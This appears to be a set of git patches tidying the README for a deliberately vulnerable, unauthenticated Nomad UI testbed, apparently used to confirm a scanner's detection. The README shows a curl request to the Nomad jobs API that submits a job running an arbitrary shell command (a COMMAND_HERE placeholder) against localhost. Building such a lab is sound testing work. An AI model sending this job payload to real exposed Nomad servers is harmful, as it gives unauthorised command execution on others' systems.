@@ -1,6 +1,7 @@ # Set Up an Unauthenticated Nomad UI (Vulnerable) You can install the Nomad CLI according to the official document: https://developer.hashicorp.com/nomad/install -OR base on ubuntu 24.04 with docker run the following command to run nomad: + +OR to run Nomad on Ubuntu 24.04 with Docker run the following command: ## Warnings 1. The containers will run with `--privileged`. 2. the container doesn't run on the Apple Silicon
From 6de4d152e23c0256443322a148df5dcd79ced60f Mon Sep 17 00:00:00 2001
From: Am <77095239+am0o0@users.noreply.github.com>
Date: Fri, 27 Feb 2026 19:56:50 +0400
Subject: [PATCH 12/14] Update hashicorp/nomad/exposed_ui/README.md
Co-authored-by: Robert Dick
---
hashicorp/nomad/exposed_ui/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index e334ef67..8d2ba38a 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -4,7 +4,7 @@ You can install the Nomad CLI according to the official document: https://develo OR to run Nomad on Ubuntu 24.04 with Docker run the following command: ## Warnings 1. The containers will run with `--privileged`. -2. the container doesn't run on the Apple Silicon +2. The container doesn't run correctly on Apple Silicon due to failure to get CPU usage when creating the job ```bash docker run --rm -it \ --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:rw \
From 4a22413941f1217b778f7ef98d4754db5e1c0190 Mon Sep 17 00:00:00 2001
From: Am <77095239+am0o0@users.noreply.github.com>
Date: Fri, 27 Feb 2026 19:56:57 +0400
Subject: [PATCH 13/14] Update hashicorp/nomad/exposed_ui/README.md
Co-authored-by: Robert Dick
---
hashicorp/nomad/exposed_ui/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index 8d2ba38a..ad40a9f8 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -14,7 +14,7 @@ docker run --rm -it \ agent -dev -bind 0.0.0.0 -network-interface='{{ GetDefaultInterfaces | attr "name" }}' ``` -# confirming the exposed ui +# Confirming the Exposed UI ```bash # replace the COMMAND_HERE with your command like `curl url` curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json; charset=utf-8' --data-raw '{"Job":{"Affinities":null,"AllAtOnce":false,"Constraints":null,"ConsulNamespace":"","CreateIndex":0,"Datacenters":["dc1"],"DispatchIdempotencyToken":null,"Dispatched":false,"ID":"tsunami-job","JobModifyIndex":0,"Meta":null,"Migrate":null,"ModifyIndex":0,"Multiregion":null,"Name":"tsunami-job","Namespace":"default","NodePool":"","NomadTokenID":"","ParameterizedJob":null,"ParentID":"","Payload":null,"Periodic":null,"Priority":50,"Region":"global","Reschedule":null,"Spreads":null,"Stable":false,"Status":"","StatusDescription":"","Stop":false,"SubmitTime":null,"TaskGroups":[{"Affinities":null,"Constraints":null,"Consul":null,"Count":1,"Disconnect":null,"EphemeralDisk":{"Migrate":false,"SizeMB":300,"Sticky":false},"MaxClientDisconnect":null,"Meta":null,"Migrate":null,"Name":"curl","Networks":null,"PreventRescheduleOnLost":null,"ReschedulePolicy":{"Attempts":1,"Delay":5000000000,"DelayFunction":"constant","Interval":86400000000000,"MaxDelay":0,"Unlimited":false},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"Scaling":null,"Services":null,"ShutdownDelay":null,"Spreads":null,"StopAfterClientDisconnect":null,"Tasks":[{"Actions":null,"Affinities":null,"Artifacts":null,"Config":{"args":["-lc","COMMAND_HERE"],"image":"curlimages/curl:8.8.0","command":"sh"},"Constraints":null,"Consul":null,"DispatchPayload":null,"Driver":"docker","Env":null,"Identities":null,"Identity":null,"KillSignal":"","KillTimeout":5000000000,"Kind":"","Leader":false,"Lifecycle":null,"LogConfig":{"Disabled":false,"Enabled":null,"MaxFileSizeMB":10,"MaxFiles":10},"Meta":null,"Name":
"run-curl","Resources":{"CPU":100,"Cores":0,"Devices":null,"DiskMB":null,"IOPS":null,"MemoryMB":64,"MemoryMaxMB":null,"NUMA":null,"Networks":null,"SecretsMB":null},"RestartPolicy":{"Attempts":3,"Delay":15000000000,"Interval":86400000000000,"Mode":"fail","RenderTemplates":false},"ScalingPolicies":null,"Schedule":null,"Services":null,"ShutdownDelay":0,"Templates":null,"User":"","Vault":null,"VolumeMounts":null}],"Update":null,"Volumes":null}],"Type":"batch","UI":null,"Update":null,"VaultNamespace":"","Version":0,"VersionTag":null,"meta":{}},"Submission":{"Source":"job \"tsunami-job\" {\n datacenters = [\"dc1\"]\n type = \"batch\"\n\n group \"curl\" {\n count = 1\n\n task \"run-curl\" {\n driver = \"docker\"\n\n config {\n image = \"curlimages/curl:8.8.0\"\n command = \"sh\"\n args = [\n \"-lc\",\n \"\"\n ]\n }\n\n resources {\n cpu = 100\n memory = 64\n }\n }\n }\n}","Format":"hcl2"}}'
From 8844a5f0c4c9205c8e7c186a0ef63c434befa3c5 Mon Sep 17 00:00:00 2001
From: Am <77095239+am0o0@users.noreply.github.com>
Date: Fri, 27 Feb 2026 19:57:04 +0400
Subject: [PATCH 14/14] Update hashicorp/nomad/exposed_ui/README.md
Co-authored-by: Robert Dick
---
hashicorp/nomad/exposed_ui/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hashicorp/nomad/exposed_ui/README.md b/hashicorp/nomad/exposed_ui/README.md
index ad40a9f8..bcf9ceeb 100644
--- a/hashicorp/nomad/exposed_ui/README.md
+++ b/hashicorp/nomad/exposed_ui/README.md
@@ -23,7 +23,7 @@ curl 'http://localhost:4646/v1/jobs' -X POST -H 'content-type: application/json curl 'http://localhost:4646/v1/job/tsunami-job?purge=true' -X DELETE -H 'content-type: application/json; charset=utf-8' ``` -# setup an authenticated nomad ui (safe) +# Set Up an Authenticated Nomad UI (Safe) This version enables Nomad's ACL system, which requires a valid token for all API and UI access. ```bash docker run --rm -it \